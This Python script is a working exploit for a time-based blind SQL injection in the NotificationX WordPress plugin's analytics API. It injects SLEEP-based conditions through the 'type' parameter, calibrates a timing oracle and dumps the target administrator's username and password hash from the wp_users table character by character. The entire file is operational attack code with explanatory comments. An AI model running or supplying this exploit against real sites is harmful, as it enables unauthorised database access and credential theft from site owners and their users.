import requests
import string
from sys import exit
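# Seconds the injected SLEEP() stalls the query. The timing oracle below treats
# a response slower than the calibrated baseline plus half of this value as
# "condition true"; raise it on a noisy link, lower it on localhost for speed.
delay = 0.3
# URL for the NotificationX Analytics API
url = "http://localhost/wp-json/notificationx/v1/analytics"
# Per-request timeout so a stalled server cannot hang the extraction forever.
timeout = 30
# Table and row queried. NOTE(review): "wp_" is only WordPress's default table
# prefix and id=1 is usually, not always, an administrator - adjust for the target.
users_table = "wp_users"
target_user_id = 1
# Upper bound on the number of characters probed per value. The original
# assumed both the username and the hash fit in 40 characters; a phpass hash
# ($P$...) is 34 characters, but bcrypt-style hashes are longer, so raise this
# if the hash extraction stops without hitting the terminator.
max_length = 40
# Candidate bytes, NUL first: MySQL's SUBSTRING() past the end of a string
# yields '' and ASCII('') is 0, so a NUL match marks the end of the value.
charset = b"\x00" + string.printable.encode()


def _payload(condition: str) -> str:
    """Return the `type` value that turns a MySQL boolean into a timing oracle.

    The plugin interpolates `type` into a backtick-quoted column name, so the
    payload closes the identifier, appends `=IF(<condition>, SLEEP(delay), null)`
    and comments out the remainder of the statement.

    Args:
        condition: MySQL boolean expression to test on the server.
    """
    return f"clicks`=IF({condition},SLEEP({delay}),null)-- -"


def _subquery(column: str) -> str:
    """Scalar subquery selecting `column` for the targeted users-table row."""
    return f"(select {column} from {users_table} where id={target_user_id})"


def _timed_post(session, payload: str) -> float:
    """POST `payload` as the `type` parameter and return the round-trip in seconds."""
    response = session.post(url, data={"nx_id": 1337, "type": payload}, timeout=timeout)
    return response.elapsed.total_seconds()


def _make_oracle(session, samples: int = 3):
    """Calibrate against the target and return a timing oracle.

    A fixed `elapsed > delay` test (what the original script did) misfires
    whenever plain network latency exceeds `delay`. Instead the same payload
    shape is first sent with an always-false condition - that branch never
    sleeps, so its slowest round-trip is the latency baseline - and a probe
    counts as true only when it exceeds that baseline by more than delay / 2.

    Args:
        session: requests.Session used for every request.
        samples: number of calibration requests; the slowest one is the baseline.
    Returns:
        a callable mapping a MySQL boolean expression to True/False.
    """
    baseline = max(_timed_post(session, _payload("1=0")) for _ in range(samples))
    threshold = baseline + delay / 2
    print(f"[*] Baseline {baseline:.3f}s, threshold {threshold:.3f}s")

    def oracle(condition: str) -> bool:
        return _timed_post(session, _payload(condition)) > threshold

    return oracle


def _find_length(oracle, column: str, limit: int = max_length) -> int:
    """Return LENGTH(column) for the target row, or 0 if nothing up to `limit` matched.

    Args:
        oracle: callable mapping a MySQL boolean expression to True/False.
        column: column of the users table to measure.
        limit: largest length tried.
    """
    for length in range(1, limit + 1):
        if oracle(f"LENGTH({_subquery(column)})={length}"):
            return length
    return 0


def _extract(oracle, column: str, limit: int = max_length, label: str = "") -> str:
    """Recover `column` of the target row one character at a time.

    Each position is probed against `charset` and the first byte the oracle
    confirms is taken. Extraction ends when the NUL candidate matches (end of
    value), when no candidate matches (end of value, or an unreliable oracle),
    or after `limit` characters - in which case the value may be truncated.

    Args:
        oracle: callable mapping a MySQL boolean expression to True/False.
        column: column of the users table to read.
        limit: maximum number of character positions probed.
        label: prefix of the progress line printed after each character.
    Returns:
        the recovered string; the NUL terminator is never appended.
    """
    recovered = ""
    for position in range(1, limit + 1):
        probe = f"ASCII(SUBSTRING({_subquery(column)},{position},1))"
        # Lazy: stops issuing requests at the first confirmed byte.
        matched = next((b for b in charset if oracle(f"{probe}={b}")), None)
        if matched is None:
            print(f"[!] {label}: no candidate matched at position {position}; "
                  "treating as end of value (check the timing threshold if unexpected)")
            break
        if matched == 0:
            # Terminator reached: the value is complete.
            break
        recovered += chr(matched)
        print(f"{label}:", recovered)
    else:
        print(f"[!] {label}: reached the {limit}-character limit; value may be truncated")
    return recovered


def main() -> None:
    """Dump the target user's login and password hash via the timing oracle."""
    session = requests.Session()
    oracle = _make_oracle(session)

    username_length = _find_length(oracle, "user_login")
    if username_length == 0:
        print(f"[!] No username length up to {max_length} produced a delay; the "
              "oracle is not working (wrong URL, patched target, or noisy timing)")
        exit(1)
    print("Admin username length:", username_length)
    # One position past the known length lets the NUL probe confirm the end.
    admin_username = _extract(oracle, "user_login", username_length + 1, "Admin username")

    admin_password_hash = _extract(oracle, "user_pass", max_length, "Admin password hash")

    print("[*] Admin credentials found:")
    print("Username:", admin_username)
    print("Password hash:", admin_password_hash)


if __name__ == "__main__":
    main()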